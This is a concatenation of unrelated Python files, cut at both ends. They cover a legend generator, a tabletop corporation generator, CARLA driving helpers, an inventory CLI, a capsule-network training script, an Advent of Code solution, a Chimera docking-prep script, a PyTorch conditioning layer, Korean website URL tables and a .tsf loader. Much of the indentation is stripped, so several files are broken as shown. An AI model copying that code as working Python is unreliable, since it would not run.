text_loc_y = max_height - max_baseline
for k in materials:
# fill square with material color
img[current_y:current_y+max_height, front_space:front_space+max_height] = materials[k]["Color"]
# put text
cv2.putText(img, k, (text_loc_x, current_y + text_loc_y), fontFace, fontScale, (255, 255, 255), 2)
# next
current_y += 5 + max_height
# show / save
cv2.imwrite("legend.png", img)
if __name__ == "__main__":
generate()
exit()
|
from .fyve import Fyve |
#!/usr/bin/env python3
#
# corporation.py
# SWN Corporation Generator
#
# Copyright (c) 2014 Steve Simenic <[email protected]>
#
# This file is part of the SWN Toolbox.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import json
import random
import sys
class Corporation:
"""
    This class generates a corporation from tables/corporation.json,
which has the following attributes:
- name (string)
- business (string)
- reputation (string)
"""
def __init__(self):
with open("tables/corporation.json", "r") as file:
corporation = json.load(file)
self.name = str(random.choice(corporation["name"]))
self.business = str(random.choice(corporation["business"]))
self.reputation = str(random.choice(corporation["reputation"]))
def __str__(self):
r = [
"Name: " + self.name,
"Business: " + self.business,
"Reputation: " + self.reputation
]
return "\n".join(r)
if __name__ == "__main__":
    try:
        times = int(sys.argv[1])
    except (IndexError, ValueError):
        times = 1
for i in range(times):
if i != 0:
print("-----------+-+-+-----------")
print(Corporation())
|
"""
This file includes a number of helper functions for the main loop of the
carla simulator, including printing measurements and steering.
"""
from carla import VehicleControl
try:
from pygame.locals import K_DOWN
from pygame.locals import K_LEFT
from pygame.locals import K_RIGHT
from pygame.locals import K_SPACE
from pygame.locals import K_UP
from pygame.locals import K_a
from pygame.locals import K_d
from pygame.locals import K_p
from pygame.locals import K_q
from pygame.locals import K_r
from pygame.locals import K_s
from pygame.locals import K_w
except ImportError:
raise RuntimeError(
'cannot import pygame, make sure pygame package is installed')
# Copyright (c) 2017 Computer Vision Center (CVC) at the Universitat Autonoma de
# Barcelona (UAB).
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
import datetime
import sys
from contextlib import contextmanager
@contextmanager
def make_connection(client_type, *args, **kwargs):
"""Context manager to create and connect a networking client object."""
client = None
try:
client = client_type(*args, **kwargs)
client.connect()
yield client
finally:
if client is not None:
client.disconnect()
class StopWatch(object):
def __init__(self):
self.start = datetime.datetime.now()
self.end = None
def restart(self):
self.start = datetime.datetime.now()
self.end = None
def stop(self):
self.end = datetime.datetime.now()
def seconds(self):
return (self.end - self.start).total_seconds()
def milliseconds(self):
return 1000.0 * self.seconds()
def to_hex_str(header):
return ':'.join('{:02x}'.format(ord(c)) for c in header)
if sys.version_info >= (3, 3):
import shutil
def print_over_same_line(text):
terminal_width = shutil.get_terminal_size((80, 20)).columns
empty_space = max(0, terminal_width - len(text))
sys.stdout.write('\r' + text + empty_space * ' ')
sys.stdout.flush()
else:
# Workaround for older Python versions.
def print_over_same_line(text):
line_length = max(print_over_same_line.last_line_length, len(text))
empty_space = max(0, line_length - len(text))
sys.stdout.write('\r' + text + empty_space * ' ')
sys.stdout.flush()
print_over_same_line.last_line_length = line_length
print_over_same_line.last_line_length = 0
class KeyboardHelper:
    @staticmethod
    def get_keyboard_control(keys, is_on_reverse, enable_autopilot):
if keys[K_r]:
return None
control = VehicleControl()
if keys[K_LEFT] or keys[K_a]:
control.steer = -1.0
if keys[K_RIGHT] or keys[K_d]:
control.steer = 1.0
if keys[K_UP] or keys[K_w]:
control.throttle = 1.0
if keys[K_DOWN] or keys[K_s]:
control.brake = 1.0
if keys[K_SPACE]:
control.hand_brake = True
if keys[K_q]:
is_on_reverse = not is_on_reverse
if keys[K_p]:
enable_autopilot = not enable_autopilot
control.reverse = is_on_reverse
return control, is_on_reverse, enable_autopilot
class MeasurementsDisplayHelper:
    @staticmethod
    def print_player_measurements_map(player_measurements, map_position, lane_orientation, timer):
message = 'Step {step} ({fps:.1f} FPS): '
message += 'Map Position ({map_x:.1f},{map_y:.1f}) '
message += 'Lane Orientation ({ori_x:.1f},{ori_y:.1f}) '
message += '{speed:.2f} km/h, '
message += '{other_lane:.0f}% other lane, {offroad:.0f}% off-road'
message = message.format(
map_x=map_position[0],
map_y=map_position[1],
ori_x=lane_orientation[0],
ori_y=lane_orientation[1],
step=timer.step,
fps=timer.ticks_per_second(),
speed=player_measurements.forward_speed * 3.6,
other_lane=100 * player_measurements.intersection_otherlane,
offroad=100 * player_measurements.intersection_offroad)
print_over_same_line(message)
    @staticmethod
    def print_player_measurements(player_measurements, timer):
message = 'Step {step} ({fps:.1f} FPS): '
message += '{speed:.2f} km/h, '
message += '{other_lane:.0f}% other lane, {offroad:.0f}% off-road'
message = message.format(
step=timer.step,
fps=timer.ticks_per_second(),
speed=player_measurements.forward_speed * 3.6,
other_lane=100 * player_measurements.intersection_otherlane,
offroad=100 * player_measurements.intersection_offroad)
print_over_same_line(message)
|
if __name__ == "__main__":
inventorydict = {}
inventoryprice = {}
itemgroup = {}
while True:
        print('press 1 to create inventory items',
              '\npress 2 to delete items from inventory',
              '\npress 3 to view items in inventory',
              '\npress 4 to edit items in inventory',
              '\npress 5 to assign items to a group and view groups',
              '\npress 6 to quit')
inp = input('Choose an option: ')
if inp == '1':
while True:
inp1 = input('type items or type exit to quit: ').lower()
                if inp1 == 'exit':
                    break
                inp2 = input('set price: ')
                if inp2 == 'exit':
                    break
else:
if inp1 not in inventorydict:
inventorydict[inp1] = 1
inventoryprice[inp1] = inp2
else:
inventorydict[inp1] += 1
inventoryprice[inp1] = inp2
if inp == '2':
while True:
inp3 = input('which item do you want to remove? or type exit to quit: ').lower()
if inp3 == 'exit':
break
else:
if inp3 in inventorydict:
inventorydict.pop(inp3)
inventoryprice.pop(inp3)
                        itemgroup.pop(inp3, None)  # the item may not belong to any group
else:
print('item is not in the inventory')
if inp == '3':
while True:
inp4 = input('Do you want to view items? (Y/N) or type exit to quit: ').lower()
                if inp4 in ('exit', 'n', 'no'):
break
if inp4 == 'y':
                    for i in inventorydict:
print(f'item: {i}, quantity: {inventorydict[i]}, price per item: {inventoryprice[i]}')
if inp == '4':
while True:
inp5 = input('Do you want to change price or quantity or group? (P/Q/G) or type exit to quit: ').lower()
if inp5 == 'exit':
break
if inp5 == 'p':
inp6 = input('give item name: ').lower()
if inp6 in inventorydict:
inp7 = input('set new price: ')
inventoryprice[inp6] = inp7
else:
inp8 = input('Item not in inventory. Would you like to add? (Y/N)').lower()
if inp8 == 'n':
break
if inp8 == 'y':
inp10 = input('item price: ')
inventorydict[inp6] = 1
inventoryprice[inp6] = inp10
if inp5 == 'q':
inp11 = input('give item name: ').lower()
if inp11 in inventorydict:
inp12 = input('set new quantity: ')
                        inventorydict[inp11] = int(inp12)  # keep quantities as ints, matching option 1
else:
inp13 = input('Item not in inventory. Would you like to add? (Y/N)').lower()
if inp13 == 'n':
break
if inp13 == 'y':
inp14 = input('set new quantity: ')
inp15 = input('set new price: ' )
                            inventorydict[inp11] = int(inp14)
inventoryprice[inp11] = inp15
if inp5 == 'g':
if len(itemgroup)==0:
print('No groups available!')
break
else:
while True:
inp19 = input('type item name or exit to quit: ').lower()
if inp19 == 'exit':
break
if inp19 not in itemgroup:
print('This item does not have a group!')
break
inp20 = input('Do you want to assign or exit? (assign/exit) ').lower()
if inp20 == 'assign':
inp21 = input('set group name: ')
inp22 = input('set quantity: ')
inp23 = input('set price: ')
                                inventorydict[inp19] = int(inp22)
inventoryprice[inp19] = inp23
itemgroup[inp19] = inp21
if inp == '5':
if len(inventorydict)==0 and len(inventoryprice)==0:
                print("You don't have any items in your inventory!")
else:
while True:
inp16 = input('Do you wish to view item group or create new group? (view/create) or type exit to quit: ').lower()
if inp16 == 'create':
inp17 = input('type item name: ').lower()
inp18 = input('type item group name: ').lower()
itemgroup[inp17] = inp18
if inp16 == 'view' and len(itemgroup)==0:
                        print("You don't have any groups!")
break
if inp16 == 'view':
for i in itemgroup:
print(f'item: {i}, quantity: {inventorydict[i]}, price per item: {inventoryprice[i]}, item group: {itemgroup[i]}')
if inp16 =='exit':
break
if inp == '6':
break |
from shutil import copyfile
import json
import datetime
import argparse
import sys
import os
sys.path.append(os.path.abspath('../'))
# SEEDS
from numpy.random import seed
seed(1234)
from tensorflow import set_random_seed
set_random_seed(1234)
# CONFIG
import config
from config import path_output, path_logs, path_checkpoints, path_tests, path_predictions, h, w
from config import monitor, mode, filename_save, save_best_only, use_multiprocessing, workers, max_queue_size, initial_epoch
from config import batch_size, epochs, custom_callbacks, pretrain_config, load_weights_by_name, freeze_loaded_weights
from config import steps_per_epoch, validation_steps, steps
from config import optimizer, loss, metrics, loss_weights
from config import do_pipeline_predictions, do_pipeline_hidden, shuffle_pred, steps_pred
# UTILS
from utils.callbacks import get_common_callbacks
from utils.batch_generators import DatasetGenerator
from utils.enums import Mode, Dataset, Feature
# MODELS
from models.conv_blocks import ApiConvBlocks, NO_CONV_BLOCK
from models.caps_blocks import ApiCapsBlocks, ApiCapsBlocks_flatten, NO_CAPS_BLOCK, caps_block_get_group
# DEEP
import h5py
import cv2
import numpy as np
from keras import backend as K
from keras.layers import Input
from keras.models import Model
K.set_image_data_format('channels_last')
def build_model(caps_block_group, caps_block_value, conv_block_value, mode_value, inputs, path_model = None):
# Load model from API Catalog
outputs = ApiCapsBlocks[caps_block_group][caps_block_value](conv_block_value, mode_value, inputs)
# Model definition
model = Model(inputs, outputs, name = '__'.join([caps_block_group, caps_block_value, conv_block_value]))
# If load weights
if path_model is not None:
# If string, make it list (as 'pretrain_config' is)
if isinstance(path_model, str):
path_model = [path_model]
# Load all weights files
for path_model_item in path_model:
model.load_weights(path_model_item, by_name = load_weights_by_name)
# Freeze loaded weights
if freeze_loaded_weights:
for name in [layer.name for layer in model.layers if layer.name in list(h5py.File(path_model_item, 'r').keys())]:
model.get_layer(name).trainable = False
# Compile the model
model.compile(optimizer = optimizer, loss = loss, metrics = metrics, loss_weights = loss_weights)
return model
def train(caps_block_value, conv_block_value, feature_value):
# Set Mode Value
mode_value = Mode.train.value
# Get capsule model group
caps_block_group = caps_block_get_group(caps_block_value)
# Config generators
gen_train = DatasetGenerator(batch_size = batch_size, image_size = (h, w), shuffle = True, dataset_value = Dataset.train.value, steps_per_epoch = steps_per_epoch)
gen_val = DatasetGenerator(batch_size = batch_size, image_size = (h, w), shuffle = True, dataset_value = Dataset.val.value)
inputs = gen_train.config_pipeline(caps_block_group, caps_block_value, conv_block_value, feature_value, mode_value)
_ = gen_val.config_pipeline(caps_block_group, caps_block_value, conv_block_value, feature_value, mode_value)
# Subfolder
experiment_id = datetime.datetime.now().strftime('%Y%m%d_%H_%M_%S')
sub_folder = os.path.join(path_output, feature_value, conv_block_value, caps_block_value, experiment_id)
# Callbacks
callbacks = get_common_callbacks(sub_folder = sub_folder, path_logs = path_logs, path_checkpoints = path_checkpoints,
monitor = monitor, mode = mode, filename_save = filename_save, save_best_only = save_best_only) + custom_callbacks
# Copy config file to experiment folder
copyfile(config.__file__, os.path.join(sub_folder, 'config_train.py'))
# Model
model = build_model(caps_block_group, caps_block_value, conv_block_value, mode_value, inputs, pretrain_config)
model.summary()
model.fit_generator(generator = gen_train, validation_data = gen_val,
steps_per_epoch = steps_per_epoch, validation_steps = validation_steps, epochs = epochs, callbacks = callbacks,
use_multiprocessing = use_multiprocessing, workers = workers, max_queue_size = max_queue_size, initial_epoch = initial_epoch)
gen_train.save_trace_sampling(os.path.join(sub_folder, path_logs, 'trace_sampling.npy'))
def test(caps_block_value, conv_block_value, feature_value, experiment_id):
# Set Mode Value
mode_value = Mode.test.value
# Get capsule model group
caps_block_group = caps_block_get_group(caps_block_value)
# Config generator
gen_test = DatasetGenerator(batch_size = 1, image_size = (h, w), shuffle = True, dataset_value = Dataset.test.value)
inputs = gen_test.config_pipeline(caps_block_group, caps_block_value, conv_block_value, feature_value, mode_value)
# Subfolder
sub_folder = os.path.join(path_output, feature_value, conv_block_value, caps_block_value, experiment_id)
# Mkdir (with test_id)
test_id = datetime.datetime.now().strftime('%Y%m%d_%H_%M_%S')
path_tests_full = os.path.join(sub_folder, path_tests, test_id)
if not os.path.exists(path_tests_full):
os.makedirs(path_tests_full)
# Copy config file to path_tests_full folder
copyfile(config.__file__, os.path.join(path_tests_full, 'config_test.py'))
# Model
model = build_model(caps_block_group, caps_block_value, conv_block_value, mode_value, inputs)
model.summary()
# Loop over model weights (if multiple)
path_model_filenames = sorted([item for item in os.listdir(os.path.join(sub_folder, path_checkpoints)) if item.endswith('.h5')])
for path_model_filename in path_model_filenames:
# Model: load weights
print('\n\nTEST CKPT: ' + path_model_filename + '\n\n')
path_model = os.path.join(sub_folder, path_checkpoints, path_model_filename)
model.load_weights(path_model, by_name = load_weights_by_name)
# Scores
scores = model.evaluate_generator(generator = gen_test, steps = steps, use_multiprocessing = use_multiprocessing,
workers = workers, max_queue_size = max_queue_size, verbose = 1)
# Save
scores_filename = 'scores.json' if len(path_model_filenames) == 1 else 'scores-{}.json'.format(os.path.splitext(path_model_filename)[0])
with open(os.path.join(path_tests_full, scores_filename), 'w') as f:
json.dump(dict(zip(model.metrics_names, list(scores))), f, indent = 4)
def predict(caps_block_value, conv_block_value, feature_value, experiment_id, do_visual):
# Set Mode Value
mode_value = Mode.predict.value
# Get capsule model group
caps_block_group = caps_block_get_group(caps_block_value)
# Config generator
gen_predict = DatasetGenerator(batch_size = 1, image_size = (h, w), shuffle = shuffle_pred, dataset_value = Dataset.predict.value)
inputs = gen_predict.config_pipeline(caps_block_group, caps_block_value, conv_block_value, feature_value, mode_value)
# Subfolder
sub_folder = os.path.join(path_output, feature_value, conv_block_value, caps_block_value, experiment_id)
# Mkdir (with prediction_id)
prediction_id = datetime.datetime.now().strftime('%Y%m%d_%H_%M_%S')
path_predictions_full = os.path.join(sub_folder, path_predictions, prediction_id)
if not os.path.exists(path_predictions_full):
os.makedirs(path_predictions_full)
# Copy config file to path_predictions_full folder
copyfile(config.__file__, os.path.join(path_predictions_full, 'config_predict.py'))
# Model
path_model = os.path.join(sub_folder, path_checkpoints, 'weights.h5')
model = build_model(caps_block_group, caps_block_value, conv_block_value, mode_value, inputs, path_model = path_model)
model.summary()
# Build pipeline of predictions: predict, write results, etc.
if do_pipeline_predictions:
gen_predict.pipeline_predictions(model, path_predictions_full, do_visual, steps_pred)
# Build pipeline of hidden representations: compute, write results, etc.
if do_pipeline_hidden:
gen_predict.pipeline_hidden(model, path_predictions_full)
if __name__ == "__main__":
# Parse args
parser = argparse.ArgumentParser()
parser.add_argument('--mode', '-m', help = 'Mode of execution', type = Mode, choices = list(Mode))
parser.add_argument('--feature', '-f', help = 'Feature from dataset', type = Feature, choices = list(Feature), default = Feature.all)
parser.add_argument('--conv_block', help = 'ConvBlock model', type = str, choices = list(ApiConvBlocks), default = NO_CONV_BLOCK)
parser.add_argument('--caps_block', help = 'CapsBlock model', type = str, choices = list(ApiCapsBlocks_flatten), default = NO_CAPS_BLOCK)
parser.add_argument('--experiment_id', help = '[TEST/PREDICT] Experiment ID is defined as experiment folder name (provided as a date)', type = str)
parser.add_argument('--do_visual', help = '[PREDICT] If used, save visual predictions along with metrics file', action = 'store_true')
args = parser.parse_args()
# Train
if args.mode == Mode.train:
train(args.caps_block, args.conv_block, args.feature.value)
# Test
if args.mode == Mode.test:
test(args.caps_block, args.conv_block, args.feature.value, args.experiment_id)
# Predict
if args.mode == Mode.predict:
predict(args.caps_block, args.conv_block, args.feature.value, args.experiment_id, args.do_visual)
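# Example invocations (a sketch: the script name and block identifiers are
# placeholders, and Mode values are assumed to match their lowercase names):
#   python main.py --mode train --feature all --conv_block <conv> --caps_block <caps>
#   python main.py --mode test --conv_block <conv> --caps_block <caps> --experiment_id 20200101_12_00_00
#   python main.py --mode predict --conv_block <conv> --caps_block <caps> --experiment_id 20200101_12_00_00 --do_visual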
|
import helpers
def combine_mask(mask, i):
p = 35
o = 0
m = 1
while p >= 0:
v = i % 2
i = int(i/2)
if (v == 1 and mask[p] == 'X') or mask[p] == '1':
o += m
m = m*2
p -= 1
return o
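# Worked example (the AoC 2020 day 14 part 1 sample): with
#   mask = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXX1XXXX0X'
# combine_mask(mask, 11) == 73, because '1' positions force the bit on,
# '0' positions force it off, and 'X' positions keep the value's own bit.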
def calc_sum(lines):
    mem = {}
    for i in lines:
if 'mask' in i:
mask = i.split(' = ')[1]
elif 'mem' in i:
v = int(i.split(' = ')[1])
a = int(i.split('mem[', 1)[1].split(']', 1)[0])
mem[a] = combine_mask(mask, v)
s = 0
for m in mem:
s += mem[m]
return s
def combine_mask2(mask, i):
p = 35
base = 0
m = 1
xpos = []
while p >= 0:
v = i % 2
i = int(i/2)
if mask[p] == 'X':
xpos.append(m)
else:
if v == 1 or mask[p] == '1':
base += m
m = m*2
p -= 1
memlocs = []
for a in range(0, pow(2, len(xpos))):
p = 0
m = base
d = a
while d > 0:
if (d % 2):
m += xpos[p]
p += 1
d = int(d/2)
memlocs.append(m)
return memlocs
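# Worked example (the AoC 2020 day 14 part 2 sample): with
#   mask = '000000000000000000000000000000X1001X'
# combine_mask2(mask, 42) == [26, 27, 58, 59], because '0' keeps the address
# bit, '1' forces it on, and every 'X' floats over both 0 and 1.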
def calc_sum2(lines):
    mem = {}
    for i in lines:
if 'mask' in i:
mask = i.split(' = ')[1]
elif 'mem' in i:
v = int(i.split(' = ')[1])
a = int(i.split('mem[', 1)[1].split(']', 1)[0])
for m in combine_mask2(mask, a):
mem[m] = v
s = 0
for m in mem:
s += mem[m]
return s
test_inp = helpers.read_file_as_array_str(
'./inputs_test_day14.txt')
test_res = calc_sum(test_inp)
if test_res != 165:
    print('algorithm part 1 not working...yet')
exit()
inp = helpers.read_file_as_array_str(
'./inputs_day14.txt')
res = calc_sum(inp)
print('part 1', res)
test_inp2 = helpers.read_file_as_array_str(
'./inputs_test_day14b.txt')
test_res2 = calc_sum2(test_inp2)
if test_res2 != 208:
    print('algorithm part 2 not working...yet')
exit()
res = calc_sum2(inp)
print('part 2', res)
|
#!/usr/bin/env python
__author__="Thomas Evangelidis"
__email__="[email protected]"
import os
from argparse import ArgumentParser, RawDescriptionHelpFormatter
## Parse command line arguments
def cmdlineparse():
parser = ArgumentParser(formatter_class=RawDescriptionHelpFormatter, description="""
DESCRIPTION:
This is a Python script to prepare the receptor-ligand complex for scoring. If you encounter problems with the input pdb file then try correcting it using:
1) pdb4amber from AmberTools (https://github.com/Amber-MD/pdb4amber)
2) pdbfixer (https://github.com/pandegroup/pdbfixer)
TODO: add optional support for LYS and CYS protonated forms.
https://www.cgl.ucsf.edu/chimera/docs/ContributedSoftware/addh/addh.html
""",
epilog="""
### EXAMPLE 1:
pychimera $(which dockprep.py) -complex 3K5C-BACE_150_complex.pdb -cmethod gas -neut
""")
parser.add_argument("-complex", dest="COMPLEX", required=False, default=None, type=str,
help="pdb file with the holo form of the receptor.")
parser.add_argument("-cmethod", dest="CHARGE_METHOD", required=False, default='gas', type=str, choices=['gas', 'am1'],
help="Method to calculate charges fo the ligand. Default: %(default)s")
parser.add_argument("-neut", dest="NEUTRALIZE", required=False, default=False, action='store_true',
help="Neutralize the system by adding coutner ions.")
parser.add_argument("-stripions", dest="STRIP_IONS", required=False, default=False, action='store_true',
help="Strip out all ions.")
parser.add_argument("-rec", dest="RECEPTOR", required=False, default=None, type=str,
help="Instead of -complex give the pdb file with the apo form of the receptor.")
parser.add_argument("-lig", dest="LIGAND", required=False, default=None, type=str,
help="Instead of -complex give an sdf or mol2 file with optimized ligand structure from which to find the "
"binding site residues.")
args = parser.parse_args()
return args
if __name__ == "__main__":
args = cmdlineparse()
import chimera
from chimera import runCommand as rc
from Addions import initiateAddions
from DockPrep import prep
from AddCharge import estimateFormalCharge
from chimera.selection import currentResidues
if args.COMPLEX:
rc("open %s" % args.COMPLEX) # load the protein-ligand complex
if args.STRIP_IONS:
rc("delete ions")
rc("split #0 ligands")
rc("sel #0.2") # select the ligand
ligres = currentResidues()[0]
ligres.type = 'LIG' # change the resname of the ligand to 'LIG'
rc("combine #0.1 modelId 1") # create a new molecule containing just the receptor
rc("combine #0.2 modelId 2") # create a new molecule containing just the ligand
# Now that we calculated the charges of the protein and the ligand, we just need the complex
rc("combine #1,2 modelId 3") # create a new molecule containing the protein-ligand complex
rc("del #0-2")
pdb = args.COMPLEX.replace(".pdb", "_prep.pdb")
elif args.RECEPTOR and args.LIGAND:
rc("open %s" % args.RECEPTOR) # load the receptor
rc("open %s" % args.LIGAND) # load the ligand
if args.STRIP_IONS:
rc("delete ions")
rc("sel #1") # select the ligand
ligres = currentResidues()[0]
ligres.type = 'LIG' # change the resname of the ligand to 'LIG'
rc("combine #0,1 modelId 2") # create a new molecule containing the protein-ligand complex
rc("combine #2 modelId 3") # create a new molecule containing the protein-ligand complex
rc("del #0-2")
pdb = os.path.splitext(os.path.basename(args.RECEPTOR))[0] + "_" + os.path.splitext(os.path.basename(args.LIGAND))[0] + "_prep.pdb"
print("Preparing receptor for docking and calculating ligand '%s' charges (may be slow)." % args.CHARGE_METHOD)
models = chimera.openModels.list(modelTypes=[chimera.Molecule])
prep(models, nogui=True, method=args.CHARGE_METHOD)
net_charge = estimateFormalCharge(models[0].atoms)
# Neutralize system
if args.NEUTRALIZE:
if net_charge < 0:
initiateAddions(models, "Na+", "neutralize", chimera.replyobj.status)
elif net_charge > 0:
initiateAddions(models, "Cl-", "neutralize", chimera.replyobj.status)
if net_charge != 0:
            # change the resids of the ions, which by default are all 1
rc("sel ~ions")
existing_resids = [int(str(r.id).split('.')[0]) for r in currentResidues()]
start = max(existing_resids) + 2
rc("resrenumber %i ions" % start) # renumber the resids of the added ions
# change the resid of the ligand
rc('sel #3 & ~ #3:LIG')
existing_resids = [int(str(r.id).split('.')[0]) for r in currentResidues()]
start = max(existing_resids) + 2
rc("resrenumber %i #3:LIG" % start)
rc("combine #3 modelId 4") # create a new molecule to split it into receptor and ligand
rc("split #4 atoms ~#4:LIG")
rc("combine #4.1 modelId 5") # create a new molecule containing just the receptor
rc("combine #4.2 modelId 6") # create a new molecule containing just the ligand
models = chimera.openModels.list(modelTypes=[chimera.Molecule])
    # for m in models: print(len(m.atoms), estimateFormalCharge(m.atoms))  # DEBUGGING
rec_charge = estimateFormalCharge(models[3].atoms)
lig_charge = estimateFormalCharge(models[4].atoms)
rc("del #4-6")
# Finally, write the complex pdb file with headers
rc("changechains B A all") # <== OPTIONAL (ligand and protein will be chain A for homology modeling)
rc("write format pdb #3 %s" % pdb)
with open(pdb, "r+") as f:
s = f.read()
f.seek(0)
f.write("# receptor net charge = %i\n# ligand net charge = %i\n" % (rec_charge, lig_charge)) # after system neutralization
f.write(s)
|
import torch
import torch.nn as nn
import re
class TaskCompositionBlockV1(nn.Module):
"""
This block takes the input features and conditions them with respect to
the Task Palette embedding computed with the task representation block.
"""
def __init__(self, cfg_txt, in_channels, out_channels, dim_latent_w, ks, **kwargs):
super().__init__()
# Convolutional layer
pd = ks // 2
self.conv1 = nn.Conv2d(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=ks,
padding=pd
)
# Spatial task conditioning
self.spatial_cond = SpatialAffineCond(
cfg_txt=cfg_txt,
dim_latent_w=dim_latent_w,
n_out_ch=out_channels
)
# Activation - leaky relu
self.act = nn.LeakyReLU()
def forward(self, feature_map, latent_w_tensor, **kwargs):
result = self.conv1(feature_map)
result = self.spatial_cond(
feature_map=result,
latent_w_tensor=latent_w_tensor
)
result = self.act(result)
return result
class SpatialAffineCond(nn.Module):
"""
    Applies normalization with statistics in a BatchNorm fashion,
    followed by an affine transformation with spatial task-wise encoding.
    Implementation adapted from:
    https://github.com/NVlabs/SPADE/blob/master/models/networks/normalization.py
"""
def __init__(self, cfg_txt, dim_latent_w, n_out_ch):
super().__init__()
# Parse the configuration text that says which norm's
# statistical normalization to use and which filter size
# to use for computing the affine transformation parameters.
assert cfg_txt.startswith('cond')
        parsed = re.search(r'cond_(\D+)(\d)x\d_hid(\d+)', cfg_txt)
param_free_norm_type = str(parsed.group(1))
ks = int(parsed.group(2))
pw = ks // 2
n_hidden = int(parsed.group(3))
# Choose the appropriate parameter free normalization
if param_free_norm_type == 'instance':
self.param_free_norm = nn.InstanceNorm2d(
num_features=n_out_ch,
affine=False
)
elif param_free_norm_type == 'batch':
self.param_free_norm = nn.BatchNorm2d(
num_features=n_out_ch,
affine=False
)
# elif param_free_norm_type == 'syncbatch':
# self.param_free_norm = SynchronizedBatchNorm2d(norm_nc, affine=False)
else:
raise NotImplementedError
# Computes intermediate embedding space
self.conv_shared = nn.Sequential(
nn.Conv2d(
in_channels=dim_latent_w,
out_channels=n_hidden,
kernel_size=ks,
padding=pw,
bias=True
),
nn.LeakyReLU()
)
# Layers which apply the affine transformation conditioning
self.affine_beta = torch.nn.Conv2d(
in_channels=n_hidden,
out_channels=n_out_ch,
kernel_size=ks,
stride=1,
padding=pw,
bias=True
)
self.affine_gamma = torch.nn.Conv2d(
in_channels=n_hidden,
out_channels=n_out_ch,
kernel_size=ks,
stride=1,
padding=pw,
bias=True
)
# Bias initialization
self.affine_beta.bias.data[:] = 0
self.affine_gamma.bias.data[:] = 1
def forward(self, feature_map, latent_w_tensor):
# Pass the latent code w map through a conv layer
spat_w_code = self.conv_shared(latent_w_tensor)
# Compute affine conditioning tensors
# (conditioned on the task palette embedding map w)
spat_gamma = self.affine_gamma(spat_w_code)
spat_beta = self.affine_beta(spat_w_code)
return self.param_free_norm(feature_map) * spat_gamma + spat_beta
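# A minimal smoke test for the blocks above (a sketch: the cfg string, channel
# sizes and spatial dims are assumptions consistent with the
# 'cond_<norm><k>x<k>_hid<n>' pattern parsed in SpatialAffineCond).
if __name__ == "__main__":
    block = TaskCompositionBlockV1(
        cfg_txt='cond_batch3x3_hid64',
        in_channels=32,
        out_channels=64,
        dim_latent_w=16,
        ks=3
    )
    feats = torch.randn(2, 32, 8, 8)   # input feature map
    w_map = torch.randn(2, 16, 8, 8)   # spatial task palette embedding
    out = block(feature_map=feats, latent_w_tensor=w_map)
    assert out.shape == (2, 64, 8, 8)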
|
search_engine = {
'나무위키': 'https://namu.wiki/w/',
'리브레위키': 'https://librewiki.net/wiki/',
'백괴사전': 'https://uncyclopedia.kr/wiki/',
'위키백과': 'https://ko.wikipedia.org/wiki/',
'진보위키': 'https://jinbowiki.org/wiki/index.php/',
'구스위키': 'http://goos.wiki/index.php?title=',
'구글': 'https://www.google.co.kr/search?q=',
'네이버': 'https://search.naver.com/search.naver?query=',
'스팀': 'http://store.steampowered.com/search/?term='
}
direct_url = {
'나무위키': 'https://namu.wiki/w/',
'리브레위키': 'https://librewiki.net/wiki/',
'백괴사전': 'https://uncyclopedia.kr/wiki/',
'위키백과': 'https://ko.wikipedia.org/wiki/',
'진보위키': 'https://jinbowiki.org/wiki/index.php/',
'구스위키': 'http://goos.wiki/index.php',
'구글': 'https://www.google.co.kr/',
'네이버': 'https://search.naver.com/',
'애니플러스': 'http://www.aniplustv.com',
'트위터': 'https://twitter.com/',
'페이스북': 'https://www.facebook.com/',
'유튜브': 'https://www.youtube.com/',
'구글플레이스토어': 'https://play.google.com/store',
'애니맥스플러스': 'http://www.animaxplus.co.kr',
'트위치': 'http://www.twitch.tv',
'애스크FM': 'http://www.ask.fm',
'배틀넷': 'http://www.blizzard.com/ko-kr/',
'행아웃': 'https://hangouts.google.com',
'텔레그램': 'https://web.telegram.org/',
'디스코드': 'https://discordapp.com/',
'스카이프': 'https://web.skype.com/',
'파파고': 'https://papago.naver.com/',
'구글번역기': 'https://translate.google.co.kr/?hl=ko',
'텀블벅': 'https://tumblbug.com/',
'킥스타터': 'https://www.kickstarter.com/',
'G마켓': 'http://www.gmarket.co.kr/',
'옥션': 'http://www.auction.co.kr/',
'에버노트': 'https://evernote.com/intl/ko',
'픽시브': 'https://www.pixiv.net/?lang=ko',
'알파위키': 'https://alphawiki.org'
}
hentai_url = {
'히토미': 'https://hitomi.la',
'익헨': 'https://e-hentai.org/'
} |
from datetime import datetime
from distutils.util import strtobool
import numpy as np
import pandas as pd
# Converts the contents in a .tsf file into a dataframe and returns
# it along with other meta-data of the dataset:
# frequency, horizon, whether the dataset contains missing values and whether the series have equal lengths
#
# Parameters
# full_file_path_and_name - complete .tsf file path
# replace_missing_vals_with - a term to indicate the missing values in series in the returning dataframe
# value_column_name - Any name that is preferred to have as the name of the column containing series values in the returning dataframe
def convert_tsf_to_dataframe(
full_file_path_and_name,
replace_missing_vals_with="NaN",
value_column_name="series_value",
):
col_names = []
col_types = []
all_data = {}
line_count = 0
frequency = None
forecast_horizon = None
contain_missing_values = None
contain_equal_length = None
found_data_tag = False
found_data_section = False
started_reading_data_section = False
with open(full_file_path_and_name, "r", encoding="cp1252") as file:
for line in file:
# Strip white space from start/end of line
line = line.strip()
if line:
if line.startswith("@"): # Read meta-data
if not line.startswith("@data"):
